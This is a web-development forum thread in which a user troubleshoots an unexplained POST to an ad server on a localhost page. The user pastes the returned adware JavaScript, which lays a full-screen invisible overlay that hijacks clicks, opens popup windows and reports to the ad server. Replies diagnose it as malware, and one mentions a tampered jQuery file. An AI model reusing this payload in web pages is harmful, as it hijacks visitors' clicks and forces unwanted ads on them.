unknown POST api.adsrun.net/post" on localhost?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
ershadow786
Forum Newbie
Posts: 2
Joined: Mon Nov 09, 2015 7:31 am

unknown POST api.adsrun.net/post" on localhost?

Post by ershadow786 »

I am have debugging some javascript code in firebug,then i have seen some strange POST thing in firebug this is worrying me?
I have registration form when i reload page i see in firebug following "POST http://api.adsrun.net/post"[b]

Response Header
Cache-Control
no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection
keep-alive
Content-Type
application/json
Date
Mon, 09 Nov 2015 13:25:43 GMT
Expires
Thu, 19 Nov 1981 08:52:00 GMT
Pragma
no-cache
Server
nginx/1.9.4
Set-Cookie
PHPSESSID=a0f52694494daab764d719b907baff6b; expires=Sat, 07-Nov-2020 13:25:43 GMT; Max-Age=157680000
; path=/
Transfer-Encoding
chunked
access-control-allow-cred...
true
access-control-allow-head...
Content-Type
access-control-allow-orig...
http://localhost
p3p
CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"[/b]


RESPONSE is something like this

{"eval":"\nvar ad = response.ad;\nvar ad_token = response.ad_token;\nfunction postAction(xlog, cb) {
\n var params = {\"ad_id\":14,\"show_id\":27,\"user_id\":1573819,\"host\":\"localhost\",\"time\":1447075543
,\"hash\":\"6dd0fd2392c7a0cc9800ccfcea9143ed\"};\n params.postActionParams = xlog;\n ajax(\"http:\
/\/api.adsrun.net\/postAction\", params, cb);\n}\nvar ontw = false;\r\nfunction oNT() {\r\n if (ontw
) return;\r\n else ontw = true;\r\n var b = window.open(ad.url, \"new\" + Math.floor(9999999 *
Math.random()) + 1);\r\n if (b) postAction(); \r\n\r\n\/\/ var e = navigator.userAgent.toLowerCase
(),o = -1 != e.indexOf(\"opera\"),g = -1 != e.indexOf(\"chrome\");\r\n\r\n \/\/ if (document.createEvent
&& (o || g)) {\r\n \/\/ if (false) {\r\n \/\/ var b = document.createElement(\"a\");\r\n
\/\/ b.href = ad.url;\r\n \/\/ b.target = \"_blank\";\r\n \/\/ var c = document.createEvent
(\"MouseEvents\");\r\n \/\/ c.initMouseEvent(\"click\", !0, !0, window, 1, 0, 0, 0, 0, !0, !1,
!1, !1, 1, null);\r\n \/\/ b.dispatchEvent(c);\r\n \/\/ postAction();\r\n \/\/ } \r\n
\/\/ else {\r\n \/\/ var b = window.open(\"about:blank\", \"win\" + Math.floor(9999999 * Math
.random()) + 1);\r\n \/\/ with(b) opener.window.focus(), b.location = ad.url, \"undefined\" !=
typeof window.mozPaintCount && window.open(\"about:blank\").close()\r\n \/\/ if (b) postAction
(); \r\n \/\/ }\r\n \r\n\r\n}\r\n\r\n\r\n\r\n var startTimeout = setTimeout(myStart, 100),divret
= null;\r\nif (\"function\" == typeof window.addEventListener) window.addEventListener(\"load\", function
() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n}, !1);\r\nelse try {\r\n window.attachEvent
(\"onload\", function() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n })\r\n} catch
(D) {}\r\n\r\nfunction myStart() { \r\n\r\n var pdiv = document.createElement('div');\r\n
pdiv.style.position = \"fixed\";\r\n pdiv.style.zIndex = \"2147483647\";\r\n pdiv.style
.width = \"100%\";\r\n pdiv.style.height = \"100%\";\r\n pdiv.style.left = \"0px\";\r\n
pdiv.style.top = \"0px\";\r\n pdiv.onclick = function() {\r\n oNT();\r\n document
.body.removeChild(pdiv);\r\n }\r\n if (!divret) {divret=document.body.appendChild(pdiv);}\r
\n document.addEventListener ? document.addEventListener(\"mouseup\", oNT, !1) : document.attachEvent
(\"onmouseup\", oNT);\r\n \r\n}","ad":{"url":"http:\/\/www.adcash.com\/ad\/display.php?r=356017"
},"ad_token":"31f68d20ffc59b05601acfa0dc349e4b14"}


I am not sure this some malware type may be harmful??I have encountered this problem from 2 days looks strange to me and need your suggestions?

JSON :
[text]var ad = response.ad;
var ad_token = response.ad_token;
function postAction(xlog, cb) {
var params = {"ad_id":14,"show_id":27,"user_id":1573819,"host":"localhost","time":1447075543,"hash":"6dd0fd2392c7a0cc9800ccfcea9143ed"};
params.postActionParams = xlog;
ajax("http://api.adsrun.net/postAction", params, cb);
}
var ontw = false;

function oNT() {

if (ontw) return;

else ontw = true;

var b = window.open(ad.url, "new" + Math.floor(9999999 * Math.random()) + 1);

if (b) postAction();



// var e = navigator.userAgent.toLowerCase(),o = -1 != e.indexOf("opera"),g = -1 != e.indexOf("chrome");



// if (document.createEvent && (o || g)) {

// if (false) {
[/text]
User avatar
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: unknown POST api.adsrun.net/post" on localhost?

Post by requinix »

adsrun.net is a domain used by some kind of proxy/filter/etc. bypassing stuff. Do you have an extension installed that has anything to do with that? What <script> or Javascript code is triggering the call?
ershadow786
Forum Newbie
Posts: 2
Joined: Mon Nov 09, 2015 7:31 am

Re: unknown POST api.adsrun.net/post" on localhost?

Post by ershadow786 »

thanks for reply:
i am not sure which javascript code is triggering that call[http://api.adsrun.net/post] but after looking at JSON there is key url whose url " "http://www.newpoptab.com/watch?key=60fd ... 056f84047d" " this changed after restart and before that it was tradeadexchange.after googleing i found that they were ad ware malware.I tried antivirus avg but none could remove however spyhunter could detect that but for removing it requires paid version :(.Any help appreciated
User avatar
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: unknown POST api.adsrun.net/post" on localhost?

Post by requinix »

Yeah, that could certainly explain it.

I normally clean computers by hand so I can't point you to any good anti-malware stuff. I think HijackThis is still around, but it takes a bit of know-how regarding what it reports and what should be cleaned. Microsoft has a free antivirus too. Don't remember what it's called.
Also check the most obvious place: list of programs installed in Windows. Some of the nicer malware actually lets you uninstall it.
User avatar
Celauran
Moderator
Posts: 6425
Joined: Tue Nov 09, 2010 2:39 pm
Location: Montreal, Canada

Re: unknown POST api.adsrun.net/post" on localhost?

Post by Celauran »

requinix wrote:Microsoft has a free antivirus too. Don't remember what it's called.
Do you mean Microsoft Security Essentials? I haven't used Windows in years, so that may not be current.
User avatar
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: unknown POST api.adsrun.net/post" on localhost?

Post by requinix »

Celauran wrote:
requinix wrote:Microsoft has a free antivirus too. Don't remember what it's called.
Do you mean Microsoft Security Essentials? I haven't used Windows in years, so that may not be current.
Yeah. There's also a somethingorother Endpoint Protection which is basically the business version. They're consistently not rated very highly, but they doesn't cripple the computer like some other free AV programs do.
vgstef
Forum Newbie
Posts: 1
Joined: Tue Feb 09, 2016 12:59 am

Re: unknown POST api.adsrun.net/post" on localhost?

Post by vgstef »

I found this thread looking for information. I got the same issue, and I found where it came from.

In our website site project, a colleague included the file "jquery-2.2.0.min.js", but that had been hacked with a short on load window listener function. That function was querying a website to get spam content.
Post Reply